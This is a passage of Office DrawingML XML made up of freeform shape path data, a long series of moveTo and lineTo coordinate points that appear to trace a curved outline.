                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="595983" y="4092507"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="571305" y="4092507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="507551" y="4127750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="442781" y="4160897"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="376741" y="4192050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="309558" y="4221006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="309812" y="4220929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="341843" y="4220929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="382075" y="4203581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="448496" y="4172250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="513520" y="4138913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="577528" y="4103569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="595983" y="4092507"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="376868" y="4191961"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="376662" y="4192050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="376868" y="4191961"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="442908" y="4160808"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="442720" y="4160897"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="442908" y="4160808"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="507678" y="4127648"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="507480" y="4127750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="507678" y="4127648"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="656861" y="4055283"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="633408" y="4055283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="571051" y="4092621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="571305" y="4092507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="595983" y="4092507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="640012" y="4066116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="656861" y="4055283"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="1045766" y="3742749"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1028124" y="3742749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="976308" y="3792787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="922841" y="3841047"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="867850" y="3887529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="811462" y="3932360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="753423" y="3975223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694114" y="4016256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="633154" y="4055385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="633408" y="4055283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="656861" y="4055283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="701226" y="4026759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="760916" y="3985497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="819209" y="3942266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="875978" y="3897308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="931350" y="3850572"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984944" y="3802058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1037014" y="3751766"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045766" y="3742749"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="694241" y="4016142"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="694063" y="4016256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694241" y="4016142"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="753550" y="3975108"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="753385" y="3975223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="753550" y="3975108"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="811589" y="3932233"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="811417" y="3932360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="811589" y="3932233"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="867977" y="3887402"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="867817" y="3887529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="867977" y="3887402"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="922968" y="3840920"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="922818" y="3841047"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="922968" y="3840920"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="1095407" y="3691060"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1078289" y="3691060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1028064" y="3742807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045766" y="3742749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1087433" y="3699823"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1095407" y="3691060"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="1143455" y="3637720"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1126676" y="3637720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1078162" y="3691187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1095407" y="3691060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1136201" y="3646229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1143455" y="3637720"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="1189661" y="3582983"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1173412" y="3582983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1126549" y="3637847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1143455" y="3637720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1183191" y="3591111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1189661" y="3582983"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="1234156" y="3526595"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1218243" y="3526595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1173285" y="3583110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1189661" y="3582983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1228276" y="3534469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1234156" y="3526595"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="1276907" y="3468810"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1261423" y="3468810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1218116" y="3526722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1234156" y="3526595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1271710" y="3476303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1276907" y="3468810"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="1356749" y="3348795"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1341941" y="3348795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1302571" y="3409628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1261296" y="3468937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1276907" y="3468810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1313112" y="3416613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1352609" y="3355653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1356749" y="3348795"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="1302571" y="3409501"/>
                  </a:moveTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="1393941" y="3286692"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1379406" y="3286692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1341814" y="3348922"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1356749" y="3348795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1390328" y="3293169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1393941" y="3286692"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="1462131" y="3158676"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1448113" y="3158676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1414585" y="3223573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1379279" y="3286819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1393941" y="3286692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1425888" y="3229415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1459416" y="3164391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1462131" y="3158676"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="1414712" y="3223319"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1414570" y="3223573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1414712" y="3223319"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="1493232" y="3092763"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1479355" y="3092763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1447986" y="3158803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1462131" y="3158676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1490912" y="3098097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1493232" y="3092763"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="1522199" y="3025707"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1508565" y="3025707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1479228" y="3092890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1479355" y="3092763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1493232" y="3092763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1520249" y="3030660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1522199" y="3025707"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="1548938" y="2957381"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1535489" y="2957381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1508438" y="3025834"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1508565" y="3025707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1522199" y="3025707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1547300" y="2961953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1548938" y="2957381"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="1573666" y="2887912"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1560381" y="2887912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1535362" y="2957635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1535489" y="2957381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1548938" y="2957381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1572319" y="2892103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1573666" y="2887912"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="1690552" y="2194619"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1677856" y="2194619"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1677856" y="2195000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1674173" y="2304601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1674099" y="2305109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1665029" y="2414710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1650170" y="2525073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1629596" y="2635817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1603180" y="2746307"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1582860" y="2817808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1560254" y="2888166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1560381" y="2887912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1573666" y="2887912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1595052" y="2821364"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1615499" y="2749355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1642042" y="2638230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1662743" y="2526978"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1677602" y="2415980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1686873" y="2305109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1690552" y="2195000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1690552" y="2194619"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="1582860" y="2817554"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1582779" y="2817808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1582860" y="2817554"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="1603180" y="2746053"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1603108" y="2746307"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1603180" y="2746053"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="1629596" y="2635436"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1629505" y="2635817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1629596" y="2635436"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="1650170" y="2524819"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1650123" y="2525073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1650170" y="2524819"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="1665029" y="2414456"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1664995" y="2414710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1665029" y="2414456"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="1674173" y="2304220"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1674142" y="2304601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1674173" y="2304220"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="1677852" y="2194750"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1677843" y="2195000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1677852" y="2194750"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="1681480" y="1977703"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1668839" y="1977703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1676078" y="2086034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1677852" y="2194750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1677856" y="2194619"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1690552" y="2194619"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1688651" y="2085399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1681480" y="1977703"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="1675951" y="2085780"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1675955" y="2086034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1675951" y="2085780"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="1669157" y="1870515"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1656393" y="1870515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1668839" y="1977957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1668839" y="1977703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1681480" y="1977703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1681412" y="1976687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1669157" y="1870515"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="1569308" y="1455733"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1556063" y="1455733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1588575" y="1557333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1616134" y="1660330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1638867" y="1764978"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1656393" y="1870769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1656393" y="1870515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1669157" y="1870515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1668966" y="1868864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1651313" y="1762438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1628453" y="1657155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1600767" y="1553523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1569308" y="1455733"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="1638740" y="1764597"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1638803" y="1764978"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1638740" y="1764597"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="1616007" y="1660076"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1616062" y="1660330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1616007" y="1660076"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="1588448" y="1556952"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1588550" y="1557333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1588448" y="1556952"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="1444425" y="1163379"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1430206" y="1163379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1430333" y="1163633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1476942" y="1258883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1518852" y="1356419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1556063" y="1455987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1556063" y="1455733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1569308" y="1455733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1568001" y="1451669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1530536" y="1351593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1488372" y="1253422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1444425" y="1163379"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="1518725" y="1356165"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1518820" y="1356419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1518725" y="1356165"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="1476815" y="1258629"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1476924" y="1258883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1476815" y="1258629"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="1430308" y="1163587"/>
                  </a:moveTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="1279674" y="892234"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1264344" y="892234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1324161" y="980245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1379533" y="1070669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1430308" y="1163587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1430206" y="1163379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1444425" y="1163379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1441636" y="1157664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1390455" y="1064192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1334702" y="973260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1279674" y="892234"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="1379279" y="1070415"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1379418" y="1070669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1379279" y="1070415"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="1323907" y="979991"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1324063" y="980245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1323907" y="979991"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="1216453" y="807525"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1200590" y="807525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1264471" y="892488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1264344" y="892234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1279674" y="892234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1274758" y="884995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1216453" y="807525"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="1078035" y="647124"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1060890" y="647124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1132899" y="725991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1200717" y="807779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1200590" y="807525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1216453" y="807525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1210623" y="799778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1142297" y="717609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1078035" y="647124"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="1132645" y="725737"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1132856" y="725991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1132645" y="725737"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="1003182" y="572067"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="985198" y="572067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1061017" y="647378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1060890" y="647124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1078035" y="647124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1070161" y="638488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1003182" y="572067"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="924645" y="500439"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="905696" y="500439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="985325" y="572194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1003182" y="572067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="993961" y="562923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="924645" y="500439"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="842519" y="432494"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="822384" y="432494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905823" y="500566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="924645" y="500439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="914078" y="490914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="842519" y="432494"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
